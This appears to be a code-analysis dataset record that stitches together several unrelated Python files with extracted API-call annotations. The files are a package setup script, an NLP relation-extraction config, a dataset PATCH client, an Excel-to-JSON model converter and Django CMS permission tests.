] | [((240, 1302), 'setuptools.setup', 'setup', ([], {'name': '"""shadho"""', 'version': '"""0.4.3.post2"""', 'description': '"""Hyperparameter optimizer with distributed hardware at heart"""', 'long_description': 'LONG_DESCRIPTION', 'long_description_content_type': '"""text/markdown"""', 'url': '"""https://github.com/jeffkinnison/shadho"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'python_requires': '""">=3.5"""', 'packages': "['shadho', 'shadho.installers', 'shadho.managers', 'shadho.workers']", 'classifiers': "['Development Status :: 4 - Beta', 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7', 'Operating System :: POSIX',\n 'Operating System :: Unix']", 'keywords': '"""machine_learning hyperparameters distributed_computing"""', 'install_requires': "['numpy', 'scipy', 'scikit-learn', 'pyrameter']", 'tests_require': "['pytest']", 'include_package_data': '(True)'}), "(name='shadho', version='0.4.3.post2', description=\n 'Hyperparameter optimizer with distributed hardware at heart',\n long_description=LONG_DESCRIPTION, long_description_content_type=\n 'text/markdown', url='https://github.com/jeffkinnison/shadho', author=\n '<NAME>', author_email='<EMAIL>', python_requires='>=3.5', packages=[\n 'shadho', 'shadho.installers', 'shadho.managers', 'shadho.workers'],\n classifiers=['Development Status :: 4 - Beta',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7', 'Operating System :: POSIX',\n 'Operating System :: Unix'], 
keywords=\n 'machine_learning hyperparameters distributed_computing',\n install_requires=['numpy', 'scipy', 'scikit-learn', 'pyrameter'],\n tests_require=['pytest'], include_package_data=True)\n", (245, 1302), False, 'from setuptools import setup\n'), ((154, 179), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (169, 179), False, 'import os\n')] |
import os
class config():
    """Paths, serving endpoints, and label inventories for the SKE
    relation-extraction pipeline (BERT-based classification + sequence
    labeling)."""
    # Populated elsewhere before use -- empty by default.
    input_dir = ''
    # Maximum sequence length, kept as a string.
    max_len = '128'
    pretrain_model_dir = ''
    # All relative paths below are rooted at the current working directory.
    home_dir = os.getcwd() + '/'
    data_dir = home_dir + 'raw_data/ske/'
    # TensorFlow Serving REST endpoint (host:port).
    tf_serving_addr = '127.0.0.1:8501'
    bert_vocab_dir = home_dir + 'pretrained_model/chinese_wwm_ext_L-12_H-768_A-12/vocab.txt'
    bert_config_dir =home_dir + 'pretrained_model/chinese_wwm_ext_L-12_H-768_A-12/bert_config.json'
    # Checkpoints for the predicate classifier and the sequence labeler.
    class_model_dir = 'output/predicate_classification_model/epochs6/model.ckpt-6000'
    seq_model_dir = 'output/sequnce_labeling_model/epochs9/model.ckpt-85304'
    middle_out_dir = './output/predicate_infer_out'
    out_dir = './output/sequnce_infer_out/epochs9/ckpt22000'
    # BIO-style token labels for subject/object spans; id 0 --> [Padding].
    token_label = ["[Padding]", "[category]", "[##WordPiece]", "[CLS]", "[SEP]", "B-SUB", "I-SUB", "B-OBJ", "I-OBJ", "O"] #id 0 --> [Paddding]
    #class_label = ['所需检查', '推荐用药', '疾病症状', '治疗方式']
    # The 49 SKE relation (predicate) types.
    class_label = ['丈夫', '上映时间', '专业代码', '主持人', '主演', '主角', '人口数量', '作曲', '作者', '作词', '修业年限', '出品公司', '出版社', '出生地', '出生日期','创始人', '制片人', '占地面积', '号', '嘉宾', '国籍', '妻子', '字', '官方语言', '导演', '总部地点', '成立日期', '所在城市', '所属专辑', '改编自', '朝代', '歌手', '母亲', '毕业院校', '民族', '气候', '注册资本', '海拔', '父亲', '目', '祖籍', '简称', '编剧', '董事长', '身高', '连载网站','邮政编码', '面积', '首都']
    # Per-relation (object_type, subject_type) constraints.
    schema = {
        '父亲': [('人物', '人物')],
        '妻子': [('人物', '人物')],
        '母亲': [('人物', '人物')],
        '丈夫': [('人物', '人物')],
        '祖籍': [('地点', '人物')],
        '总部地点': [('地点', '企业')],
        '出生地': [('地点', '人物')],
        '目': [('目', '生物')],
        '面积': [('Number', '行政区')],
        '简称': [('Text', '机构')],
        '上映时间': [('Date', '影视作品')],
        '所属专辑': [('音乐专辑', '歌曲')],
        '注册资本': [('Number', '企业')],
        '首都': [('城市', '国家')],
        '导演': [('人物', '影视作品')],
        '字': [('Text', '历史人物')],
        '身高': [('Number', '人物')],
        '出品公司': [('企业', '影视作品')],
        '修业年限': [('Number', '学科专业')],
        '出生日期': [('Date', '人物')],
        '制片人': [('人物', '影视作品')],
        '编剧': [('人物', '影视作品')],
        '国籍': [('国家', '人物')],
        '海拔': [('Number', '地点')],
        '连载网站': [('网站', '网络小说')],
        '朝代': [('Text', '历史人物')],
        '民族': [('Text', '人物')],
        '号': [('Text', '历史人物')],
        '出版社': [('出版社', '书籍')],
        '主持人': [('人物', '电视综艺')],
        '专业代码': [('Text', '学科专业')],
        '歌手': [('人物', '歌曲')],
        '作词': [('人物', '歌曲')],
        '主角': [('人物', '网络小说')],
        '董事长': [('人物', '企业')],
        '成立日期': [('Date', '机构'), ('Date', '企业')],
        '毕业院校': [('学校', '人物')],
        '占地面积': [('Number', '机构')],
        '官方语言': [('语言', '国家')],
        '邮政编码': [('Text', '行政区')],
        '人口数量': [('Number', '行政区')],
        '所在城市': [('城市', '景点')],
        '作者': [('人物', '图书作品')],
        '作曲': [('人物', '歌曲')],
        '气候': [('气候', '行政区')],
        '嘉宾': [('人物', '电视综艺')],
        '主演': [('人物', '影视作品')],
        '改编自': [('作品', '影视作品')],
        '创始人': [('人物', '企业')]}
| [
"os.getcwd"
] | [((108, 119), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (117, 119), False, 'import os\n')] |
import json
import sys
import os
import requests
from datasets.diff_helper import DiffHelper
from common.constants import BASE_HEADERS, FAIR_API_ENDPOINT, SSL_VERIFY, FAIR_URL, DRY_RUN
def dataset_url(code):
    """Return the full FAIR API URL for the given dataset code."""
    return "{}{}".format(FAIR_API_ENDPOINT, code)
def get_request(dataset_code):
    """GET the dataset; print the API error and exit(1) on a non-200 reply."""
    response = requests.get(
        dataset_url(dataset_code), headers=BASE_HEADERS, verify=SSL_VERIFY
    )
    if response.status_code == 200:
        return response
    body = response.json()
    print(f'\nFailed to get dataset: Status code: {response.status_code}, Error message: {body["error"]["message"]}')
    exit(1)
def patch_request(data):
    """PATCH a dataset with the diff between the server copy and *data*.

    Fetches the current dataset, computes the minimal diff, prints it, and
    (unless DRY_RUN) sends the PATCH. Exits the process on API errors.

    Args:
        data (dict): local dataset definition; must contain catalogue.id.
    """
    dataset_code = data['catalogue']['id']
    resp = get_request(dataset_code)
    original = resp.json()
    # Only the fields that differ are sent to the API.
    diff = DiffHelper.dataset_diff(original, data)
    print (f'\nPATCH {dataset_url(dataset_code)} --data {json.dumps(diff, indent=2)}')
    if DRY_RUN:
        return # In dry-run mode we do nothing past this point
    print('Sending request...')
    response = requests.patch(
        dataset_url(dataset_code),
        headers=BASE_HEADERS,
        json=diff,
        verify=SSL_VERIFY
    )
    # NOTE: rebinds the `data` parameter to the response payload from here on.
    data = response.json()
    if response.status_code != 200:
        print(f'Failed to patch dataset: Status code: {response.status_code}, Error message: {data["error"]["message"]}')
        exit(1)
    # NOTE(review): a one-key payload is presumably an error envelope while a
    # full dataset object has many keys -- confirm against the API contract.
    if len(data) != 1:
        print(f'Patched dataset: {data["code"]}')
        print(f'View on the web at: {FAIR_URL}#/data/datasets/{data["code"]}')
    else:
        print(f'Expected 1 dataset in response - received {(data)}')
# Script must be run with at least 1 argument
if len(sys.argv) < 2:
    print(f'Usage: {sys.argv[0]} <path to dataset definition json file> <--dry-run>')
    exit(1)

# First argument must be a path to a file
definition_file = sys.argv[1]
if not os.path.isfile(definition_file):
    print(f'Provided path "{definition_file}" does not seem to be a file, ensure the path is correct and try again')
    exit(1)

# Parse the definition and send the PATCH.
with open(definition_file) as fh:
    data = json.load(fh)
    patch_request(data)
| [
"os.path.isfile",
"json.dumps",
"json.loads",
"datasets.diff_helper.DiffHelper.dataset_diff"
] | [((740, 779), 'datasets.diff_helper.DiffHelper.dataset_diff', 'DiffHelper.dataset_diff', (['original', 'data'], {}), '(original, data)\n', (763, 779), False, 'from datasets.diff_helper import DiffHelper\n'), ((1804, 1835), 'os.path.isfile', 'os.path.isfile', (['definition_file'], {}), '(definition_file)\n', (1818, 1835), False, 'import os\n'), ((2032, 2051), 'json.loads', 'json.loads', (['payload'], {}), '(payload)\n', (2042, 2051), False, 'import json\n'), ((837, 863), 'json.dumps', 'json.dumps', (['diff'], {'indent': '(2)'}), '(diff, indent=2)\n', (847, 863), False, 'import json\n')] |
import os
import json
from collections import OrderedDict
import pandas as pd
def write_json_to_file(json_data, json_file_path):
    """Pretty-print a JSON string (sorted keys, 4-space indent) to a file.

    Args:
        json_data (str): a JSON document as a string.
        json_file_path (str): destination path (overwritten if present).
    """
    parsed = json.loads(json_data)
    formatted = json.dumps(parsed, indent=4, sort_keys=True)
    # `with` guarantees the handle is closed even if the write raises
    # (the original leaked the handle on error).
    with open(json_file_path, 'w') as out_file:
        out_file.write(formatted)
def standardize_json_string(json_string):
    """Replace double quotes with single quotes wherever they occur inside
    square brackets.

    e.g. {"key":"["Key":"value"]"} => {"key":"['Key':'value']"}

    Bracket nesting is intentionally not tracked (a single boolean flag),
    matching the original behavior.

    Args:
        json_string (str): raw JSON text.

    Returns:
        str: the text with quotes normalized inside [...] spans.
    """
    inside_brackets = False
    # Collect characters and join once: O(n) instead of the original
    # quadratic string concatenation.
    chars = []
    for ch in json_string:
        if ch == '[':
            inside_brackets = True
        elif ch == ']':
            inside_brackets = False
        if inside_brackets and ch == '"':
            chars.append("'")
        else:
            chars.append(ch)
    return ''.join(chars)
def update_json_structure(main_json_obj):
    """Re-shape the flat sheet dictionaries into the nested system-model JSON.

    Pass-through tables (system_meta, sysout_setup, sysinp_setup,
    node_conn_df) are copied unchanged. Every component gains a
    "damages_states_constructor" mapping: state "0" ("DS0 None") is
    synthesized with fixed defaults, and further damage states are filled
    from `fragility_data`, whose keys are string-serialized sequences
    decoded with eval() (index 1 = component type, index 2 = damage state).

    Args:
        main_json_obj (dict): parsed workbook sheets (see read_excel_to_json).

    Returns:
        OrderedDict: the restructured model dictionary.
    """
    system_meta = main_json_obj["system_meta"]
    sysout_setup = main_json_obj["sysout_setup"]
    sysinp_setup = main_json_obj["sysinp_setup"]
    node_conn_df = main_json_obj["node_conn_df"]
    component_list = main_json_obj["component_list"]
    damage_state_df = main_json_obj["damage_state_df"]
    fragility_data = main_json_obj["fragility_data"]
    # Tables that carry over without modification.
    new_json_structure = OrderedDict()
    new_json_structure["system_meta"] = system_meta
    new_json_structure["sysout_setup"] = sysout_setup
    new_json_structure["sysinp_setup"] = sysinp_setup
    new_json_structure["node_conn_df"] = node_conn_df
    # Rebuild each component entry, renaming a few fields
    # (op_capacity -> operating_capacity, pos_x/pos_y -> longitude/latitude).
    new_json_structure["component_list"] = OrderedDict()
    for component in component_list:
        new_json_structure["component_list"][component] = OrderedDict()
        new_json_structure["component_list"][component]["component_class"] \
            = component_list[component]["component_class"]
        new_json_structure["component_list"][component]["component_type"] \
            = component_list[component]["component_type"]
        new_json_structure["component_list"][component]["cost_fraction"] \
            = component_list[component]["cost_fraction"]
        new_json_structure["component_list"][component]["node_cluster"] \
            = component_list[component]["node_cluster"]
        new_json_structure["component_list"][component]["node_type"] \
            = component_list[component]["node_type"]
        new_json_structure["component_list"][component]["operating_capacity"] \
            = component_list[component]["op_capacity"]
        new_json_structure["component_list"][component]["longitude"] \
            = component_list[component]["pos_x"]
        new_json_structure["component_list"][component]["latitude"] \
            = component_list[component]["pos_y"]
        # Damage state "0" (no damage) is always present with fixed defaults.
        new_json_structure["component_list"][component]\
            ["damages_states_constructor"] = OrderedDict()
        new_json_structure["component_list"][component]\
            ["damages_states_constructor"]["0"] = OrderedDict()
        new_json_structure["component_list"][component]\
            ["damages_states_constructor"]["0"]["damage_state_name"] \
            = "DS0 None"
        new_json_structure["component_list"][component]\
            ["damages_states_constructor"]["0"]["functionality"]\
            = 1.0
        new_json_structure["component_list"][component]\
            ["damages_states_constructor"]["0"]["damage_ratio"]\
            = 0.0
        new_json_structure["component_list"][component]\
            ["damages_states_constructor"]["0"]\
            ["response_function_constructor"]\
            = OrderedDict()
        new_json_structure["component_list"][component]\
            ["damages_states_constructor"]["0"]\
            ["response_function_constructor"]\
            ["function_name"] \
            = "Level0Response"
        new_json_structure["component_list"][component]\
            ["damages_states_constructor"]["0"]\
            ["response_function_constructor"]\
            ["damage_state_definition"]\
            = "Not Available."
        new_json_structure["component_list"][component]\
            ["damages_states_constructor"]["0"]\
            ["recovery_function_constructor"]\
            = OrderedDict()
        new_json_structure["component_list"][component]\
            ["damages_states_constructor"]["0"]\
            ["recovery_function_constructor"]["function_name"]\
            = "Level0Response"
        new_json_structure["component_list"][component]\
            ["damages_states_constructor"]["0"]\
            ["recovery_function_constructor"]["recovery_state_definition"]\
            = "Not Available."
        # Add the component-type-specific damage states from fragility_data;
        # `counter` numbers them 1..N in encounter order.
        counter = 0
        for key in fragility_data.keys():
            # Keys are string-serialized; index 1 = component type,
            # index 2 = damage state name.
            component_type = eval(key)[1]
            damage_state = eval(key)[2]
            if component_type == component_list[component]["component_type"]:
                damage_states_in_component = [
                    new_json_structure["component_list"][component]\
                    ["damages_states_constructor"][ds]["damage_state_name"]
                    for ds in
                    new_json_structure["component_list"][component]\
                    ["damages_states_constructor"]
                ]
                if damage_state not in damage_states_in_component:
                    counter = counter + 1
                    new_json_structure["component_list"][component]\
                        ["damages_states_constructor"][counter]\
                        = OrderedDict()
                    new_json_structure["component_list"][component]\
                        ["damages_states_constructor"][counter]\
                        ["damage_state_name"]\
                        = damage_state
                    new_json_structure["component_list"][component]\
                        ["damages_states_constructor"][counter]\
                        ["functionality"]\
                        = fragility_data[key]["functionality"]
                    new_json_structure["component_list"][component]\
                        ["damages_states_constructor"][counter]\
                        ["damage_ratio"]\
                        = fragility_data[key]["damage_ratio"]
                    new_json_structure["component_list"][component]\
                        ["damages_states_constructor"][counter]\
                        ["response_function_constructor"]\
                        = OrderedDict()
                    if fragility_data[key]["is_piecewise"] == "no":
                        # -----------------------------------------------------
                        # <BEGIN> Non-piecewise damage function
                        new_json_structure["component_list"][component]\
                            ["damages_states_constructor"][counter]\
                            ["response_function_constructor"]\
                            ["function_name"]\
                            = fragility_data[key]["damage_function"]
                        new_json_structure["component_list"][component]\
                            ["damages_states_constructor"][counter]\
                            ["response_function_constructor"]\
                            ["median"]\
                            = fragility_data[key]["median"]
                        new_json_structure["component_list"][component]\
                            ["damages_states_constructor"][counter]\
                            ["response_function_constructor"]\
                            ["beta"]\
                            = fragility_data[key]["beta"]
                        new_json_structure["component_list"][component]\
                            ["damages_states_constructor"][counter]\
                            ["response_function_constructor"]\
                            ["location"]\
                            = fragility_data[key]["location"]
                        new_json_structure["component_list"][component]\
                            ["damages_states_constructor"][counter]\
                            ["response_function_constructor"]\
                            ["fragility_source"]\
                            = fragility_data[key]["fragility_source"]
                        new_json_structure["component_list"][component]\
                            ["damages_states_constructor"][counter]\
                            ["response_function_constructor"]\
                            ["minimum"]\
                            = fragility_data[key]["minimum"]
                        # NOTE(review): eval(key).pop(0) requires the decoded
                        # key to be a list (tuples have no pop()) -- confirm
                        # the serialized key format.
                        if key in damage_state_df.keys():
                            new_json_structure["component_list"][component]\
                                ["damages_states_constructor"][counter]\
                                ["response_function_constructor"]\
                                ["damage_state_definition"]\
                                = damage_state_df[str(eval(key).pop(0))]
                        else:
                            new_json_structure["component_list"][component]\
                                ["damages_states_constructor"][counter]\
                                ["response_function_constructor"]\
                                ["damage_state_definition"]\
                                = "Not Available."
                        # <END> Non-piecewise damage function
                        # ---------------------------------------------------------
                        # <BEGIN> Piecewise defined damage function
                    else:
                        new_json_structure["component_list"][component]\
                            ["damages_states_constructor"][counter]\
                            ["response_function_constructor"]\
                            ["function_name"] = "PiecewiseFunction"
                        new_json_structure["component_list"][component]\
                            ["damages_states_constructor"][counter]\
                            ["response_function_constructor"]\
                            ["piecewise_function_constructor"] = []
                        tempDic = OrderedDict()
                        tempDic["function_name"]\
                            = fragility_data[key]["damage_function"]
                        tempDic["median"]\
                            = fragility_data[key]["median"]
                        tempDic["beta"]\
                            = fragility_data[key]["beta"]
                        tempDic["location"]\
                            = fragility_data[key]["location"]
                        tempDic["fragility_source"]\
                            = fragility_data[key]["fragility_source"]
                        tempDic["minimum"]\
                            = fragility_data[key]["minimum"]
                        if key in damage_state_df.keys():
                            tempDic["damage_state_definition"]\
                                = damage_state_df[str(eval(key).pop(0))]
                        else:
                            tempDic["damage_state_definition"]\
                                = "Not Available."
                        new_json_structure["component_list"][component]\
                            ["damages_states_constructor"][counter]\
                            ["response_function_constructor"]\
                            ["piecewise_function_constructor"].append(tempDic)
                        # <END> Piecewise defined damage function
                        # ---------------------------------------------------------
                    new_json_structure["component_list"][component]\
                        ["damages_states_constructor"][counter]\
                        ["recovery_function_constructor"]\
                        = OrderedDict()
                    new_json_structure["component_list"][component]\
                        ["damages_states_constructor"][counter]\
                        ["recovery_function_constructor"]\
                        ["function_name"]\
                        = fragility_data[key]["recovery_function"]
                    new_json_structure["component_list"][component]\
                        ["damages_states_constructor"][counter]\
                        ["recovery_function_constructor"]\
                        ["norm_mean"]\
                        = fragility_data[key]["recovery_mean"]
                    new_json_structure["component_list"][component]\
                        ["damages_states_constructor"][counter]\
                        ["recovery_function_constructor"]\
                        ["norm_stddev"]\
                        = fragility_data[key]["recovery_std"]
                    new_json_structure["component_list"][component]\
                        ["damages_states_constructor"][counter]\
                        ["recovery_function_constructor"]\
                        ["recovery_state_definition"]\
                        = "Not Available."
                # Damage state already recorded: append a further piecewise
                # segment to its response function.
                else:
                    tempDic = OrderedDict()
                    tempDic["function_name"]\
                        = fragility_data[key]["damage_function"]
                    tempDic["median"]\
                        = fragility_data[key]["median"]
                    tempDic["beta"]\
                        = fragility_data[key]["beta"]
                    tempDic["location"]\
                        = fragility_data[key]["location"]
                    tempDic["fragility_source"]\
                        = fragility_data[key]["fragility_source"]
                    tempDic["minimum"]\
                        = fragility_data[key]["minimum"]
                    if key in damage_state_df.keys():
                        tempDic["damage_state_definition"]\
                            = damage_state_df[str(eval(key).pop(0))]
                    else:
                        tempDic["damage_state_definition"]\
                            = "Not Available."
                    new_json_structure["component_list"][component]\
                        ["damages_states_constructor"][counter]\
                        ["response_function_constructor"]\
                        ["piecewise_function_constructor"].append(tempDic)
    return new_json_structure
def read_excel_to_json(excel_file_path):
    """Read every relevant sheet of a system-model workbook and assemble
    one JSON document string.

    Parameters
    ----------
    excel_file_path : str
        Path to the ``.xlsx`` model file.

    Returns
    -------
    str
        A JSON object string with one key per sheet
        (``system_meta``, ``component_list``, ``node_conn_df``,
        ``sysinp_setup``, ``sysout_setup``, ``fragility_data``,
        ``damage_state_df``).
    """
    def _sheet_json(sheet_name, index_col, sort_by=None):
        # One read/convert/standardize pipeline shared by all sheets;
        # the original repeated this sequence seven times.
        df = pd.read_excel(
            excel_file_path, sheet_name=sheet_name,
            index_col=index_col, header=0,
            skiprows=0, skipinitialspace=True)
        if sort_by is not None:
            df = df.sort_values(by=sort_by, ascending=True)
        return standardize_json_string(df.to_json(orient='index'))

    system_meta = _sheet_json('system_meta', 0)
    component_list = _sheet_json('component_list', 0)
    node_conn_df = _sheet_json('component_connections', None)
    sysinp_setup = _sheet_json('supply_setup', 0)
    # Output nodes must be ordered by priority before serialization.
    sysout_setup = _sheet_json('output_setup', 0, sort_by=['priority'])
    fragility_data = _sheet_json('comp_type_dmg_algo', [0, 1, 2])
    damage_state_df = _sheet_json('damage_state_def', [0, 1])

    # The sheet payloads are already JSON strings, so the document is
    # assembled by plain concatenation (adjacent literals merge at parse time).
    sys_model_json = (
        '{ '
        '"system_meta": ' + system_meta + ','
        '"component_list": ' + component_list + ','
        '"node_conn_df": ' + node_conn_df + ','
        '"sysinp_setup": ' + sysinp_setup + ','
        '"sysout_setup": ' + sysout_setup + ','
        '"fragility_data": ' + fragility_data + ','
        '"damage_state_df": ' + damage_state_df +
        ' }'
    )
    return sys_model_json
def main():
    """Convert every model workbook under the parent of the CWD to JSON.

    Walks the directory tree, collects ``.xlsx`` files whose path contains
    ``models``, and writes a restructured ``.json`` next to each workbook.
    """
    search_root = os.path.dirname(os.getcwd())
    workbook_paths = []
    for root, _dir_names, file_names in os.walk(search_root):
        for candidate in file_names:
            if candidate.endswith('.xlsx') and 'models' in root:
                workbook_paths.append(os.path.join(root, candidate))

    for workbook_path in workbook_paths:
        target_dir = os.path.dirname(workbook_path)
        base_name = os.path.splitext(os.path.basename(workbook_path))[0]
        # OrderedDict hook keeps the sheet/key order stable in the output.
        model = json.loads(read_excel_to_json(workbook_path),
                           object_pairs_hook=OrderedDict)
        restructured = update_json_structure(model)
        rendered = json.dumps(restructured, indent=4, sort_keys=True)
        write_json_to_file(rendered,
                           os.path.join(target_dir, base_name + '.json'))
# Script entry point: only run the conversion when executed directly.
if __name__ == "__main__":
    main()
| [
"json.loads",
"collections.OrderedDict",
"json.dumps",
"os.path.join",
"os.getcwd",
"os.path.dirname",
"os.path.basename",
"pandas.read_excel"
] | [((145, 166), 'json.loads', 'json.loads', (['json_data'], {}), '(json_data)\n', (155, 166), False, 'import json\n'), ((180, 224), 'json.dumps', 'json.dumps', (['parsed'], {'indent': '(4)', 'sort_keys': '(True)'}), '(parsed, indent=4, sort_keys=True)\n', (190, 224), False, 'import json\n'), ((1589, 1602), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1600, 1602), False, 'from collections import OrderedDict\n'), ((1860, 1873), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1871, 1873), False, 'from collections import OrderedDict\n'), ((14601, 14719), 'pandas.read_excel', 'pd.read_excel', (['excel_file_path'], {'sheet_name': '"""system_meta"""', 'index_col': '(0)', 'header': '(0)', 'skiprows': '(0)', 'skipinitialspace': '(True)'}), "(excel_file_path, sheet_name='system_meta', index_col=0,\n header=0, skiprows=0, skipinitialspace=True)\n", (14614, 14719), True, 'import pandas as pd\n'), ((14872, 14993), 'pandas.read_excel', 'pd.read_excel', (['excel_file_path'], {'sheet_name': '"""component_list"""', 'index_col': '(0)', 'header': '(0)', 'skiprows': '(0)', 'skipinitialspace': '(True)'}), "(excel_file_path, sheet_name='component_list', index_col=0,\n header=0, skiprows=0, skipinitialspace=True)\n", (14885, 14993), True, 'import pandas as pd\n'), ((15156, 15287), 'pandas.read_excel', 'pd.read_excel', (['excel_file_path'], {'sheet_name': '"""component_connections"""', 'index_col': 'None', 'header': '(0)', 'skiprows': '(0)', 'skipinitialspace': '(True)'}), "(excel_file_path, sheet_name='component_connections',\n index_col=None, header=0, skiprows=0, skipinitialspace=True)\n", (15169, 15287), True, 'import pandas as pd\n'), ((15442, 15561), 'pandas.read_excel', 'pd.read_excel', (['excel_file_path'], {'sheet_name': '"""supply_setup"""', 'index_col': '(0)', 'header': '(0)', 'skiprows': '(0)', 'skipinitialspace': '(True)'}), "(excel_file_path, sheet_name='supply_setup', index_col=0,\n header=0, skiprows=0, skipinitialspace=True)\n", (15455, 
15561), True, 'import pandas as pd\n'), ((15716, 15835), 'pandas.read_excel', 'pd.read_excel', (['excel_file_path'], {'sheet_name': '"""output_setup"""', 'index_col': '(0)', 'header': '(0)', 'skiprows': '(0)', 'skipinitialspace': '(True)'}), "(excel_file_path, sheet_name='output_setup', index_col=0,\n header=0, skiprows=0, skipinitialspace=True)\n", (15729, 15835), True, 'import pandas as pd\n'), ((16069, 16203), 'pandas.read_excel', 'pd.read_excel', (['excel_file_path'], {'sheet_name': '"""comp_type_dmg_algo"""', 'index_col': '[0, 1, 2]', 'header': '(0)', 'skiprows': '(0)', 'skipinitialspace': '(True)'}), "(excel_file_path, sheet_name='comp_type_dmg_algo', index_col=[\n 0, 1, 2], header=0, skiprows=0, skipinitialspace=True)\n", (16082, 16203), True, 'import pandas as pd\n'), ((16368, 16496), 'pandas.read_excel', 'pd.read_excel', (['excel_file_path'], {'sheet_name': '"""damage_state_def"""', 'index_col': '[0, 1]', 'header': '(0)', 'skiprows': '(0)', 'skipinitialspace': '(True)'}), "(excel_file_path, sheet_name='damage_state_def', index_col=[0,\n 1], header=0, skiprows=0, skipinitialspace=True)\n", (16381, 16496), True, 'import pandas as pd\n'), ((1971, 1984), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1982, 1984), False, 'from collections import OrderedDict\n'), ((3126, 3139), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (3137, 3139), False, 'from collections import OrderedDict\n'), ((3248, 3261), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (3259, 3261), False, 'from collections import OrderedDict\n'), ((3867, 3880), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (3878, 3880), False, 'from collections import OrderedDict\n'), ((4492, 4505), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (4503, 4505), False, 'from collections import OrderedDict\n'), ((17655, 17687), 'os.path.dirname', 'os.path.dirname', (['excel_file_path'], {}), '(excel_file_path)\n', (17670, 17687), False, 'import os\n'), 
((17975, 18035), 'json.dumps', 'json.dumps', (['new_json_structure_obj'], {'indent': '(4)', 'sort_keys': '(True)'}), '(new_json_structure_obj, indent=4, sort_keys=True)\n', (17985, 18035), False, 'import json\n'), ((18062, 18115), 'os.path.join', 'os.path.join', (['parent_folder_name', "(file_name + '.json')"], {}), "(parent_folder_name, file_name + '.json')\n", (18074, 18115), False, 'import os\n'), ((17317, 17328), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (17326, 17328), False, 'import os\n'), ((17725, 17758), 'os.path.basename', 'os.path.basename', (['excel_file_path'], {}), '(excel_file_path)\n', (17741, 17758), False, 'import os\n'), ((5782, 5795), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (5793, 5795), False, 'from collections import OrderedDict\n'), ((6714, 6727), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (6725, 6727), False, 'from collections import OrderedDict\n'), ((12047, 12060), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (12058, 12060), False, 'from collections import OrderedDict\n'), ((13299, 13312), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (13310, 13312), False, 'from collections import OrderedDict\n'), ((17488, 17517), 'os.path.join', 'os.path.join', (['root', 'file_name'], {}), '(root, file_name)\n', (17500, 17517), False, 'import os\n'), ((10388, 10401), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (10399, 10401), False, 'from collections import OrderedDict\n')] |
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from django.contrib.auth.models import User
from django.test import TestCase
from cms.api import assign_user_to_page, create_page
from ..helpers import get_request
from ..views import SearchResultsView
class PermissionsTestCase(TestCase):
    """Verify that ``SearchResultsView`` honours CMS page view permissions.

    Covers three situations, each with ``login_required`` both on and off:
    anonymous vs. logged-in users, explicit per-user view permissions, and
    pages with no permission set at all.
    """

    def setUp(self):
        self.view = SearchResultsView()
        self.request = get_request('en')
        self.request.GET = self.request.GET.copy()
        self.request.GET['q'] = 'test_page'
        self.view.request = self.request
        self.user = User.objects.create_user(
            username='jacob', email='jacob@…', password='<PASSWORD>')
        self.other_user = User.objects.create_user(
            username='fred', email='fred@…', password='<PASSWORD>')

    def _create_page(self, **data):
        return create_page(
            title='test_page',
            reverse_id='testpage',
            template='test.html',
            language='en',
            **data
        )

    def _publish_page(self, login_required, viewer=None):
        # Shared fixture: create + publish a page, optionally granting
        # view permission to one user.  The original repeated this
        # sequence in every test method.
        page = self._create_page(login_required=login_required)
        page.publish('en')
        if viewer is not None:
            assign_user_to_page(page, viewer, can_view=True)
        return page

    def _result_count(self):
        # Number of pages the view's queryset yields for the current request.
        return len(self.view.get_queryset())

    ####################################################################
    #                          login_required                          #
    ####################################################################
    def test_not_included_when_login_required_and_user_anonymous(self):
        self._publish_page(login_required=True)
        self.assertEqual(self._result_count(), 0)

    def test_included_when_login_required_when_user_logged_in(self):
        self.view.request.user = self.user
        self._publish_page(login_required=True)
        self.assertEqual(self._result_count(), 1)

    ####################################################################
    #                          page permissions                        #
    ####################################################################
    def test_included_when_perm_set_and_this_user_included(self):
        self.view.request.user = self.user
        self._publish_page(login_required=True, viewer=self.user)
        self.assertEqual(self._result_count(), 1)

    def test_not_included_when_perm_set_and_this_user_not_included(self):
        self.view.request.user = self.user
        self._publish_page(login_required=True, viewer=self.other_user)
        self.assertEqual(self._result_count(), 0)

    def test_included_when_no_perm_set(self):
        self.view.request.user = self.user
        self._publish_page(login_required=True)
        self.assertEqual(self._result_count(), 1)

    ####################################################################
    #   ensure perms still valid when login_required was not ticked    #
    ####################################################################
    def test_included_when_perm_set_and_this_user_included_2(self):
        self.view.request.user = self.user
        self._publish_page(login_required=False, viewer=self.user)
        self.assertEqual(self._result_count(), 1)

    def test_not_included_when_perm_set_and_this_user_not_included_2(self):
        self.view.request.user = self.user
        self._publish_page(login_required=False, viewer=self.other_user)
        self.assertEqual(self._result_count(), 0)

    def test_included_when_no_perm_set_2(self):
        self.view.request.user = self.user
        self._publish_page(login_required=False)
        self.assertEqual(self._result_count(), 1)
| [
"cms.api.assign_user_to_page",
"cms.api.create_page",
"django.contrib.auth.models.User.objects.create_user"
